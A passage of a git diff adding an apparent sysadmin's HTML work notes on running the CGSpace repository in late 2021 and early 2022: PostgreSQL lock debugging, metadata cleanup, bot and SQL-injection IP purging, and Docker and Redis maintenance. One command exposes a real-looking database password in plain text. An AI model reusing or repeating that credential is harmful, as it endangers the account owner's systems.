  • I think you could analyze the locks for the dspaceWeb user (XMLUI) and find out what queries were locking… but it’s so much information and I don’t know where to start +
      +
    • For now I just restarted PostgreSQL…
    • +
    • Francesca was able to do her submission immediately…
    • +
    +
  • +
  • On a related note, I want to enable the pg_stat_statements feature to see which queries get run the most, so I created the extension on the CGSpace database (see the sketch after this list)
  • +
  • I was doing some research on PostgreSQL locks and found some interesting things to consider +
      +
    • The default lock_timeout is 0, aka disabled
    • +
    • The default statement_timeout is 0, aka disabled
    • +
    • It seems to be recommended to start by setting statement_timeout first, with a rule of thumb of ten times your longest expected query
    • +
    +
  • +
  • Mark Wood mentioned the checker cron job that apparently runs in one transaction and might be an issue +
      +
    • I definitely saw it holding a bunch of locks for ~30 minutes during the first part of its execution, then it dropped them and did some other less-intensive things without locks
    • +
    +
  • +
  • Bizuwork was still not receiving emails even after we fixed the SMTP access on CGSpace +
      +
    • After some troubleshooting it turns out that the emails from CGSpace were going to her Junk folder!
    • +
    +
  • +
+
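  • For reference, the pg_stat_statements setup and a conservative statement_timeout look roughly like this (a sketch, assuming PostgreSQL 10 with pg_stat_statements in shared_preload_libraries; the timeout value is only an example and not something I have applied):
  • +
+
localhost/dspace= > CREATE EXTENSION IF NOT EXISTS pg_stat_statements;
+localhost/dspace= > SELECT calls, round(mean_time::numeric, 1) AS mean_ms, left(query, 80) AS query FROM pg_stat_statements ORDER BY calls DESC LIMIT 10;
+localhost/dspace= > ALTER SYSTEM SET statement_timeout = '300s';
+localhost/dspace= > SELECT pg_reload_conf();
+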

2021-12-03

+
    +
  • I see GARDIAN is finally using a “GARDIAN” user agent +
      +
    • I will add them to our local spider agent override in DSpace so that the hits don’t get counted in Solr
    • +
    +
  • +
+
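  • Since that override is just a file of user agent patterns, the change amounts to appending a line to the agents file referenced elsewhere in these notes (a sketch):
  • +
+
$ echo 'GARDIAN' >> dspace/config/spiders/agents/ilri
+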

2021-12-05

+
    +
  • Proof fifty records Abenet sent me from Africa Rice Center (“AfricaRice 1st batch Import”) +
      +
    • Fixed forty-six incorrect collections
    • +
    • Cleaned up and normalized affiliations
    • +
    • Cleaned up dates (extra * character in all?)
    • +
    • Cleaned up citation format
    • +
    • Fixed some encoding issues in abstracts
    • +
    • Removed empty columns
    • +
    • Removed one duplicate: Enhancing Rice Productivity and Soil Nitrogen Using Dual-Purpose Cowpea-NERICA® Rice Sequence in Degraded Savanna
    • +
    • Added volume and issue metadata by extracting it from the citations
    • +
    • All PDFs hosted on davidpublishing.com are dead…
    • +
    • All DOIs linking to African Journal of Agricultural Research are dead…
    • +
    • Fixed a handful of items marked as “Open Access” that are actually closed
    • +
    • Added many missing ISSNs
    • +
    • Added many missing countries/regions
    • +
    • Fixed invalid AGROVOC terms and added some more based on article subjects
    • +
    +
  • +
  • I also made some minor changes to the CSV Metadata Quality Checker +
      +
    • Added the ability to check if the item’s title exists in the citation
    • +
    • Updated to only run the mojibake check if we’re not running in unsafe mode (so we don’t print the same warning during both the check and fix steps)
    • +
    +
  • +
  • I ran the re-harvesting on AReS
  • +
+

2021-12-06

+
    +
  • Some minor work on the check-duplicates.py script I wrote last month +
      +
    • I found some corner cases where there were items that matched in the database, but they were in_archive=f and/or withdrawn=t, so now I check that before trying to resolve the handles of potential duplicates
    • +
    +
  • +
  • More work on the Africa Rice Center 1st batch import +
      +
    • I merged the metadata for three duplicates in Africa Rice’s items and mapped them on CGSpace
    • +
    • I did a bit more work to add missing AGROVOC subjects, countries, regions, extents, etc and then uploaded the forty-six items to CGSpace
    • +
    +
  • +
  • I started looking at the seventy CAS records that Abenet has been working on for the past few months
  • +
+

2021-12-07

+
    +
  • I sent Vini from CGIAR CAS some questions about the seventy records I was working on yesterday +
      +
    • Also, I ran the check-duplicates.py script on them and found that they might ALL be duplicates!!!
    • +
    • I tweaked the script a bit more to use the issue dates as a third criterion, and now there are fewer duplicates, but there are still at least twenty or so…
    • +
    • The script now checks if the issue date of the item in the CSV and the issue date of the item in the database are less than 365 days apart (by default)
    • +
    • For example, many items like “Annual Report 2020” can have similar title and type to previous annual reports, but are not duplicates
    • +
    +
  • +
  • I noticed a strange user agent in the XMLUI logs on CGSpace:
  • +
+
20.84.225.129 - - [07/Dec/2021:11:51:24 +0100] "GET /handle/10568/33203 HTTP/1.1" 200 6328 "-" "python-requests/2.25.1"
+20.84.225.129 - - [07/Dec/2021:11:51:27 +0100] "GET /handle/10568/33203 HTTP/2.0" 200 6315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/88.0.4298.0 Safari/537.36"
+
    +
  • I looked into it more and I see a dozen other IPs using that user agent, and they are all owned by Microsoft +
      +
    • It could be someone on Azure?
    • +
    • I opened a pull request to COUNTER-Robots and I’ll add this user agent to our local override until they decide to include it or not
    • +
    +
  • +
  • I purged 34,000 hits from this user agent in our Solr statistics:
  • +
+
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
+Purging 34458 hits from HeadlessChrome in statistics
+
+Total number of bot hits purged: 34458
+
    +
  • Meeting with partners about repositories in the One CGIAR
  • +
+

2021-12-08

+ +

2021-12-09

+
    +
  • Help Francesca upload the dataset for one CIAT publication (it has like 100 authors so we did it via CSV)
  • +
+

2021-12-12

+
    +
  • Patch OpenRXV’s Elasticsearch for the CVE-2021-44228 log4j vulnerability and re-deploy AReS +
      +
    • I added -Dlog4j2.formatMsgNoLookups=true to the Elasticsearch Java environment
    • +
    +
  • +
  • Run AReS harvesting
  • +
+

2021-12-13

+
    +
  • I ran the check-duplicates.py script on the 1,000 items from the CGIAR System Office TAC/ICW/Green Cover archives and found hundreds or thousands of potential duplicates +
      +
    • I sent feedback to Gaia
    • +
    +
  • +
  • Help Jacquie from WorldFish try to find all outputs for the Fish CRP because there are a few different formats for that name
  • +
  • Create a temporary account for Rafael Rodriguez on DSpace Test so he can investigate the submission workflow +
      +
    • I added him to the admin group on the Alliance community…
    • +
    +
  • +
+

2021-12-14

+
    +
  • I finally caught some stuck locks on CGSpace after checking several times per day for the last week:
  • +
+
$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | wc -l
+1508
+
    +
  • Now looking at the locks query sorting by age of locks:
  • +
+
$ cat locks-age.sql 
+SELECT a.datname,
+         l.relation::regclass,
+         l.transactionid,
+         l.mode,
+         l.GRANTED,
+         a.usename,
+         a.query,
+         a.query_start,
+         age(now(), a.query_start) AS "age",
+         a.pid
+FROM pg_stat_activity a
+JOIN pg_locks l ON l.pid = a.pid
+ORDER BY a.query_start;
+
    +
  • The oldest locks are 9 hours and 26 minutes old and the time on the server is Tue Dec 14 18:41:58 CET 2021, so it seems something happened around 9:15 this morning +
      +
    • I looked at the maintenance tasks and there is nothing running around then (only the sitemap update that runs at 8AM, and should be quick)
    • +
    • I looked at the DSpace log, but didn’t see anything interesting there: only editors making edits…
    • +
    • I looked at the nginx REST API logs and saw lots of GET action there from Drupal sites harvesting us…
    • +
    • So I’m not sure what is causing this… perhaps something in the XMLUI submission / task workflow
    • +
    • For now I just ran all system updates and rebooted the server
    • +
    • I also enabled Atmire’s log-db-activity.sh script to run every four hours (in the DSpace user’s crontab) so perhaps that will be better than me checking manually
    • +
    +
  • +
  • Regarding Gaia’s 1,000 items to upload to CGSpace, I checked the eighteen Green Cover records and there are no duplicates, so that’s at least a starting point! +
      +
    • I sent her a spreadsheet with the eighteen items with a new collection column to indicate where they should go
    • +
    +
  • +
+

2021-12-16

+
    +
  • Working on the CGIAR CAS Green Cover records for Gaia +
      +
    • Add months to dcterms.issued from PDFs
    • +
    • Add languages
    • +
    • Format and fix several authors
    • +
    +
  • +
  • I created a SAF archive with SAFBuilder and then imported it to DSpace Test:
  • +
+
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2021-12-16-green-covers.map
+

2021-12-19

+
    +
  • I tried to update all Docker containers on AReS and then run a build, but I got an error in the backend:
  • +
+
> openrxv-backend@0.0.1 build
+> nest build
+
+node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias 'AggregationsAggregate' circularly references itself.
+
+2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate<any> | AggregationsTermsAggregate<any> | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate<AggregationsBucket> | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
+                 ~~~~~~~~~~~~~~~~~~~~~
+node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias 'AggregationsSingleBucketAggregate' circularly references itself.
+
+3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Found 2 error(s).
+
    +
  • I’m not sure why, because I can build the backend successfully on my local machine… +
      +
    • For now I just ran all the system updates and rebooted the machine (linode20)
    • +
    • Then I started a fresh harvest
    • +
    +
  • +
  • Now I cleared all images on my local machine and I get the same error when building the backend +
      +
    • It seems to be related to @elastic/elasticsearch-js (https://github.com/elastic/elasticsearch-js), which our package.json pins with version ^7.13.0
    • +
    • I see that AReS is currently using 7.15.0 in its package-lock.json, and 7.16.0 was released four days ago so perhaps it’s that…
    • +
    • Pinning ~7.15.0 allows nest to build fine…
    • +
    • I made a pull request
    • +
    +
  • +
  • But since software sucks, now I get an error in the frontend while starting nginx:
  • +
+
nginx: [emerg] host not found in upstream "backend:3000" in /etc/nginx/conf.d/default.conf:2
+
    +
  • In other news, I’m looking at updating our Redis from version 5 to 6 (which is slightly less old, but still old!), and I’m happy to see that the release notes for version 6 say that it is compatible with 5 except for one minor thing that we don’t seem to be using (SPOP?)
  • +
  • For reference I see that our Redis 5 container is based on Debian 11, which I didn’t expect… but I still want to try to upgrade to Redis 6 eventually:
  • +
+
$ docker exec -it redis bash
+root@23692d6b51c5:/data# cat /etc/os-release 
+PRETTY_NAME="Debian GNU/Linux 11 (bullseye)"
+NAME="Debian GNU/Linux"
+VERSION_ID="11"
+VERSION="11 (bullseye)"
+VERSION_CODENAME=bullseye
+ID=debian
+HOME_URL="https://www.debian.org/"
+SUPPORT_URL="https://www.debian.org/support"
+BUG_REPORT_URL="https://bugs.debian.org/"
+
    +
  • I bumped the version to 6 on my local test machine and the logs look good:
  • +
+
$ docker logs redis
+1:C 19 Dec 2021 19:27:15.583 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
+1:C 19 Dec 2021 19:27:15.583 # Redis version=6.2.6, bits=64, commit=00000000, modified=0, pid=1, just started
+1:C 19 Dec 2021 19:27:15.583 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
+1:M 19 Dec 2021 19:27:15.584 * monotonic clock: POSIX clock_gettime
+1:M 19 Dec 2021 19:27:15.584 * Running mode=standalone, port=6379.
+1:M 19 Dec 2021 19:27:15.584 # Server initialized
+1:M 19 Dec 2021 19:27:15.585 * Loading RDB produced by version 5.0.14
+1:M 19 Dec 2021 19:27:15.585 * RDB age 33 seconds
+1:M 19 Dec 2021 19:27:15.585 * RDB memory usage when created 3.17 Mb
+1:M 19 Dec 2021 19:27:15.595 # Done loading RDB, keys loaded: 932, keys expired: 1.
+1:M 19 Dec 2021 19:27:15.595 * DB loaded from disk: 0.011 seconds
+1:M 19 Dec 2021 19:27:15.595 * Ready to accept connections
+
    +
  • The interface and harvesting all work as expected… +
      +
    • I pushed the update to OpenRXV
    • +
    +
  • +
  • I also fixed the weird “unsafe” issue in the links on AReS that Abenet told me about last week +
      +
    • When testing my local instance I realized that the thumbnail field was missing on the production AReS, and that somehow breaks the links
    • +
    +
  • +
+

2021-12-22

+
    +
  • Fix apt error on DSpace servers due to updated /etc/java-8-openjdk/security/java.security file
  • +
+

2021-12-23

+
    +
  • Add support for dropping invalid AGROVOC subjects to csv-metadata-quality
  • +
  • Move invalid AGROVOC subjects in Gaia’s eighteen green cover items on DSpace Test to cg.subject.system
  • +
  • I created an “approve” user for Rafael from CIAT to do tests on DSpace Test:
  • +
+
$ dspace user -a -m rafael-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuuuu'
+

2021-12-27

+
    +
  • Start a fresh harvest on AReS
  • +
+

2021-12-29

+
    +
  • Looking at the top IPs and user agents on CGSpace’s Solr statistics I see a strange user agent:
  • +
+
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}
+
    +
  • I found two IPs using user agents with the “randint” bug: +
      +
    • 47.252.80.214 (AliCloud in the US)
    • +
    • 61.143.40.50 (ChinaNet in China)
    • +
    +
  • +
  • I wonder what other requests have been made from those hosts where the randint spoofer was working… ugh.
  • +
  • I found some IPs from the Russian SELECTEL network making thousands of requests with SQL injection attempts… +
      +
    • 45.134.26.171
    • +
    • 45.146.166.173
    • +
    +
  • +
  • 3.225.28.105 is on Amazon and making thousands of requests for the same URL:
  • +
+
/rest/collections/1118/items?expand=all&limit=1
+
    +
  • Most of the time it has a real-looking user agent, but sometimes it uses Apache-HttpClient/4.3.4 (java 1.5)
  • +
  • Another 82.65.26.228 is doing SQL injection attempts from France
  • +
  • 216.213.28.138 is some scrape-as-a-service bot from Sprious
  • +
  • I used my resolve-addresses-geoip2.py script to get the ASNs for all the IPs in Solr stats this month, then extracted the ASNs that were responsible for more than one IP:
  • +
+
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-12-29-ips.csv
+$ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | awk '$1 > 1'
+      2 10620
+      2 265696
+      2 6147
+      2 9299
+      3 3269
+      5 16509
+      5 49505
+      9 24757
+      9 24940
+      9 64267
+
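  • To list the networks behind any one of those ASNs I can filter the same CSV again, for example (assuming the same asn and network columns as in the October cleanup above):
  • +
+
$ csvgrep -c asn -r '^64267$' /tmp/2021-12-29-ips.csv | csvcut -c network | sed 1d | sort -u
+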
    +
  • AS 64267 is Sprious, and it has used these IPs this month: +
      +
    • 216.213.28.136
    • +
    • 207.182.27.191
    • +
    • 216.41.235.187
    • +
    • 216.41.232.169
    • +
    • 216.41.235.186
    • +
    • 52.124.19.190
    • +
    • 216.213.28.138
    • +
    • 216.41.234.163
    • +
    +
  • +
  • To be honest I want to ban all their networks but I’m afraid it’s too many IPs… hmmm
  • +
  • AS 24940 is Hetzner, but I don’t feel like going through all the IPs to see… they always pretend to be normal users and make semi-sane requests so it might be a proxy or something
  • +
  • AS 24757 is Ethiopian Telecom
  • +
  • I’m going to purge all these for sure, as they are a scraping-as-a-service company and don’t use proper user agents or request robots.txt
  • +
  • AS 49505 is the Russian Selectel, and it has used these IPs this month: +
      +
    • 45.146.166.173
    • +
    • 45.134.26.171
    • +
    • 45.146.164.123
    • +
    • 45.155.205.231
    • +
    • 195.54.167.122
    • +
    +
  • +
  • I will purge them all too because they are up to no good, as I already saw earlier today (SQL injections)
  • +
  • AS 16509 is Amazon, and it has used these IPs this month: +
      +
    • 18.135.23.223 (made requests using the Mozilla/5.0 (compatible; U; Koha checkurl) user agent, so I will purge it and add it to our DSpace user agent override and submit to COUNTER-Robots)
    • +
    • 54.76.137.83 (made hundreds of requests to “/” with a normal user agent)
    • +
    • 34.253.119.85 (made hundreds of requests to “/” with a normal user agent)
    • +
    • 34.216.201.131 (made hundreds of requests to “/” with a normal user agent)
    • +
    • 54.203.193.46 (made hundreds of requests to “/” with a normal user agent)
    • +
    +
  • +
  • I ran the script to purge spider agents with the latest updates:
  • +
+
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
+Purging 2530 hits from HeadlessChrome in statistics
+Purging 10676 hits from randint in statistics
+Purging 3579 hits from Koha in statistics
+
+Total number of bot hits purged: 16785
+
    +
  • Then the IPs:
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips-to-purge.txt -p
+Purging 1190 hits from 216.213.28.136 in statistics
+Purging 1128 hits from 207.182.27.191 in statistics
+Purging 1095 hits from 216.41.235.187 in statistics
+Purging 1087 hits from 216.41.232.169 in statistics
+Purging 1011 hits from 216.41.235.186 in statistics
+Purging 945 hits from 52.124.19.190 in statistics
+Purging 933 hits from 216.213.28.138 in statistics
+Purging 930 hits from 216.41.234.163 in statistics
+Purging 4410 hits from 45.146.166.173 in statistics
+Purging 2688 hits from 45.134.26.171 in statistics
+Purging 1130 hits from 45.146.164.123 in statistics
+Purging 536 hits from 45.155.205.231 in statistics
+Purging 10676 hits from 195.54.167.122 in statistics
+Purging 1350 hits from 54.76.137.83 in statistics
+Purging 1240 hits from 34.253.119.85 in statistics
+Purging 2879 hits from 34.216.201.131 in statistics
+Purging 2909 hits from 54.203.193.46 in statistics
+Purging 1822 hits from 2605\:b100\:316\:7f74\:8d67\:5860\:a9f3\:d87c in statistics
+
+Total number of bot hits purged: 37959
+
+ + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2021/03/postgres_connections_ALL-week.png b/docs/2021/03/postgres_connections_ALL-week.png new file mode 100644 index 000000000..3b9aa9ee9 Binary files /dev/null and b/docs/2021/03/postgres_connections_ALL-week.png differ diff --git a/docs/2021/03/postgres_connections_cgspace-week.png b/docs/2021/03/postgres_connections_cgspace-week.png new file mode 100644 index 000000000..0a911b038 Binary files /dev/null and b/docs/2021/03/postgres_connections_cgspace-week.png differ diff --git a/docs/2021/03/postgres_locks_ALL-week.png b/docs/2021/03/postgres_locks_ALL-week.png new file mode 100644 index 000000000..aa44644c4 Binary files /dev/null and b/docs/2021/03/postgres_locks_ALL-week.png differ diff --git a/docs/2021/03/postgres_querylength_ALL-week.png b/docs/2021/03/postgres_querylength_ALL-week.png new file mode 100644 index 000000000..5072ac336 Binary files /dev/null and b/docs/2021/03/postgres_querylength_ALL-week.png differ diff --git a/docs/2021/04/classes_unloaded-week.png b/docs/2021/04/classes_unloaded-week.png new file mode 100644 index 000000000..4c915179d Binary files /dev/null and b/docs/2021/04/classes_unloaded-week.png differ diff --git a/docs/2021/04/group-invalid-email.png b/docs/2021/04/group-invalid-email.png new file mode 100644 index 000000000..dc2fb8922 Binary files /dev/null and b/docs/2021/04/group-invalid-email.png differ diff --git a/docs/2021/04/jmx_dspace_sessions-week.png b/docs/2021/04/jmx_dspace_sessions-week.png new file mode 100644 index 000000000..af73363b0 Binary files /dev/null and b/docs/2021/04/jmx_dspace_sessions-week.png differ diff --git a/docs/2021/04/jmx_tomcat_dbpools-week.png b/docs/2021/04/jmx_tomcat_dbpools-week.png new file mode 100644 index 000000000..55765a3a0 Binary files /dev/null and b/docs/2021/04/jmx_tomcat_dbpools-week.png differ diff --git a/docs/2021/04/nginx_status-week.png b/docs/2021/04/nginx_status-week.png new file mode 100644 index 000000000..01f988e9e Binary files /dev/null and b/docs/2021/04/nginx_status-week.png differ diff --git a/docs/2021/04/postgres_connections_cgspace-week.png b/docs/2021/04/postgres_connections_cgspace-week.png new file mode 100644 index 000000000..8bfabf413 Binary files /dev/null and b/docs/2021/04/postgres_connections_cgspace-week.png differ diff --git a/docs/2021/04/postgres_locks_ALL-week-PROD.png b/docs/2021/04/postgres_locks_ALL-week-PROD.png new file mode 100644 index 000000000..cc0c1863b Binary files /dev/null and b/docs/2021/04/postgres_locks_ALL-week-PROD.png differ diff --git a/docs/2021/04/postgres_locks_ALL-week-TEST.png b/docs/2021/04/postgres_locks_ALL-week-TEST.png new file mode 100644 index 000000000..4efd396bd Binary files /dev/null and b/docs/2021/04/postgres_locks_ALL-week-TEST.png differ diff --git a/docs/2021/04/postgres_locks_cgspace-week.png b/docs/2021/04/postgres_locks_cgspace-week.png new file mode 100644 index 000000000..5e22431b9 Binary files /dev/null and b/docs/2021/04/postgres_locks_cgspace-week.png differ diff --git a/docs/2021/04/sda-week.png b/docs/2021/04/sda-week.png new file mode 100644 index 000000000..ddc5a7b50 Binary files /dev/null and b/docs/2021/04/sda-week.png differ diff --git a/docs/2021/06/dspace-sessions-week.png b/docs/2021/06/dspace-sessions-week.png new file mode 100644 index 000000000..a89408ebf Binary files /dev/null and b/docs/2021/06/dspace-sessions-week.png differ diff --git a/docs/2021/07/context-navigation-menu.png b/docs/2021/07/context-navigation-menu.png new file mode 100644 index 000000000..8450f0f89 Binary 
files /dev/null and b/docs/2021/07/context-navigation-menu.png differ diff --git a/docs/2021/09/postgres_locks_ALL-week.png b/docs/2021/09/postgres_locks_ALL-week.png new file mode 100644 index 000000000..fa8296913 Binary files /dev/null and b/docs/2021/09/postgres_locks_ALL-week.png differ diff --git a/docs/2021/09/postgres_querylength_ALL-week.png b/docs/2021/09/postgres_querylength_ALL-week.png new file mode 100644 index 000000000..87f63fb4d Binary files /dev/null and b/docs/2021/09/postgres_querylength_ALL-week.png differ diff --git a/docs/2021/10/postgres_locks_ALL-week.png b/docs/2021/10/postgres_locks_ALL-week.png new file mode 100644 index 000000000..6e5b981a1 Binary files /dev/null and b/docs/2021/10/postgres_locks_ALL-week.png differ diff --git a/docs/2021/11/postgres_locks_ALL-week.png b/docs/2021/11/postgres_locks_ALL-week.png new file mode 100644 index 000000000..f13302de7 Binary files /dev/null and b/docs/2021/11/postgres_locks_ALL-week.png differ diff --git a/docs/2021/12/postgres_locks_ALL-week.png b/docs/2021/12/postgres_locks_ALL-week.png new file mode 100644 index 000000000..2033f41fc Binary files /dev/null and b/docs/2021/12/postgres_locks_ALL-week.png differ diff --git a/docs/2022-01/index.html b/docs/2022-01/index.html new file mode 100644 index 000000000..5092127e7 --- /dev/null +++ b/docs/2022-01/index.html @@ -0,0 +1,434 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + January, 2022 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

January, 2022

+ +
+

2022-01-01

+
    +
  • Start a full harvest on AReS
  • +
+

2022-01-06

+
    +
  • Add ORCID identifier for Chris Jones to CGSpace +
      +
    • Also tag eighty-eight of his items in CGSpace:
    • +
    +
  • +
+
$ cat 2022-01-06-add-orcids.csv
+dc.contributor.author,cg.creator.identifier
+"Jones, Chris","Chris Jones: 0000-0001-9096-9728"
+"Jones, Christopher S.","Chris Jones: 0000-0001-9096-9728"
+$ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63 -u dspacetest -p 'dom@in34sniper'
+

2022-01-09

+
    +
  • Validate and register CGSpace on OpenArchives +
      +
    • Last month IWMI colleagues were asking me to look into this, and after checking the OpenArchives mailing list it seems there was a problem on the server side
    • +
    • Now it has worked and the message is “Successfully updated OAI registration database to status COMPLIANT.”
    • +
    • I received an email (as the Admin contact on our OAI) that says:
    • +
    +
  • +
+
+

Your repository has been registered in the OAI database of conforming repositories.

+
+
    +
  • Now I’m taking a screenshot of the validation page for posterity, because the logs seem to go away after some time
  • +
+

OpenArchives.org registration

+
    +
  • I tried to re-build the Docker image for OpenRXV and got an error in the backend:
  • +
+
...
+> openrxv-backend@0.0.1 build
+> nest build
+
+node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias 'AggregationsAggregate' circularly references itself.
+
+2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate<any> | AggregationsTermsAggregate<any> | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate<AggregationsBucket> | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
+                 ~~~~~~~~~~~~~~~~~~~~~
+node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias 'AggregationsSingleBucketAggregate' circularly references itself.
+
+3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Found 2 error(s).
+
    +
  • Ah, it seems the code on the server was slightly out of date +
      +
    • I checked out the latest master branch and it built
    • +
    +
  • +
+

2022-01-12

+ +

2022-01-19

+
    +
  • Francesca was having issues with a submission on CGSpace this week +
      +
    • I checked and see a lot of locks in PostgreSQL:
    • +
    +
  • +
+
$ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
+      1 
+      1 ------------------
+      1 (3506 rows)
+      1  application_name 
+      9  psql
+     10  
+   3487  dspaceWeb
+
    +
  • As before, I see messages from PostgreSQL about processes waiting for locks since I enabled the log_lock_waits setting last month:
  • +
+
$ grep -E '^2022-01*' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
+12
+
    +
  • I set a system alert on DSpace and then restarted the server
  • +
+

2022-01-20

+
    +
  • Abenet gave me a thumbs up for Gaia’s eighteen CAS Green Cover items from last month +
      +
    • I created a SimpleArchiveFormat bundle with SAFBuilder and then imported them on CGSpace:
    • +
    +
  • +
+
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=aorth@mjanja.ch --source /tmp/SimpleArchiveFormat --mapfile=./2022-01-20-green-covers.map
+

2022-01-21

+
    +
  • Start working on the rest of the ~980 CGIAR TAC and ICW documents from Gaia +
      +
    • I did some cleanups and standardization of author names
    • +
    • I also noticed that a few dozen items had no dates at all, so I checked the PDFs and found dates for them in the text
    • +
    • Otherwise all items have only a year, which is not great…
    • +
    +
  • +
  • Proof of concept upgrade of OpenRXV from Angular 9 to Angular 10 + +
  • +
+
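  • The core of that kind of upgrade is the Angular update schematic, roughly (a sketch, not the exact commands; third-party dependencies usually need follow-up work):
  • +
+
$ npx ng update @angular/core@10 @angular/cli@10
+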

2022-01-22

+
    +
  • Spend some time adding months to the CGIAR TAC and ICW records from Gaia +
      +
    • Most of the PDFs have only YYYY, so this is annoying…
    • +
    +
  • +
+

2022-01-23

+
    +
  • Finalize cleaning up the dates on the CGIAR TAC and ICW records from Gaia
  • +
  • Rebuild AReS and start a fresh harvest
  • +
+

2022-01-25

+
    +
  • Help Udana from IWMI answer some questions about licenses on their journal articles +
      +
    • I was surprised to see they have 921 total, but only about 200 have a dcterms.license field
    • +
    • I updated about thirty manually, but really Udana should do more…
    • +
    +
  • +
  • Normalize the metadata text_lang attributes on CGSpace database:
  • +
+
dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
+ text_lang |  count  
+-----------+---------
+ en_US     | 2803350
+ en        |    6232
+           |    3200
+ fr        |       2
+ vn        |       2
+ 92        |       1
+ sp        |       1
+           |       0
+(8 rows)
+dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', '92', '');
+UPDATE 9433
+
    +
  • Then export the WLE Journal Articles collection again so there are fewer columns to mess with
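  • A sketch of that export using the standard metadata-export CLI (the collection handle here is only a placeholder):

$ dspace metadata-export -i 10568/XXXXX -f /tmp/2022-01-25-wle-journal-articles.csv
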
  • +
+

2022-01-26

+
    +
  • Send Gaia an example of the duplicate report for the first 200 TAC items to see what she thinks
  • +
+

2022-01-27

+
    +
  • Work on WLE’s Journal Articles a bit more +
      +
    • I realized that ~130 items have DOIs in their citation, but no cg.identifier.doi field
    • +
    • I used this OpenRefine GREL to copy them:
    • +
    +
  • +
+
cells['dcterms.bibliographicCitation[en_US]'].value.split("doi: ")[1]
+
    +
  • I also spent a bit of time cleaning up ILRI Journal Articles, but I notice that we don’t put DOIs in the citation so it’s not possible to fix items that are missing DOIs that way +
      +
    • And I cleaned up and normalized some licenses
    • +
    +
  • +
  • Francesca from Bioversity was having issues with a submission on CGSpace again +
      +
    • I looked at PostgreSQL and see an increasing number of locks:
    • +
    +
  • +
+
$ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
+      1 
+      1 ------------------
+      1 (537 rows)
+      1  application_name 
+      9  psql
+     51  dspaceApi
+    477  dspaceWeb
+$ grep -E '^2022-01*' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
+3
+
    +
  • I set a system alert on CGSpace and then restarted Tomcat and PostgreSQL +
      +
    • The issue in Francesca’s case was actually that someone had taken the task, not that PostgreSQL transactions were locked!
    • +
    +
  • +
+

2022-01-28

+
    +
  • Finalize the last ~100 WLE Journal Article items without licenses and DOIs +
      +
    • I did as many as I could, also updating http links to https for many journal links
    • +
    +
  • +
  • Federica Bottamedi contacted us from the system office to say that she took over for Vini (Abhilasha Vaid) +
      +
    • She created an account on CGSpace and now we need to see which workflows she should belong to
    • +
    +
  • +
  • Start a fresh harvesting on AReS
  • +
  • I adjusted the check-duplicates.py script to write the output to a CSV file including the id, both titles, both dates, and the handle link +
      +
    • I included the id because I will need a unique field to join the resulting list of non-duplicates with the original CSV where the rest of the metadata and filenames are
    • +
    • Since these items are not in DSpace yet, I generated simple numeric IDs in OpenRefine using this GREL transform: row.index + 1
    • +
    • Then I ran check-duplicates.py on items 1–200 and sent the resulting CSV to Gaia
    • +
    +
  • +
  • Delete one duplicate item I saw in IITA’s Journal Articles that was uploaded earlier in WLE +
      +
    • Also do some general cleanup on IITA’s Journal Articles collection in OpenRefine
    • +
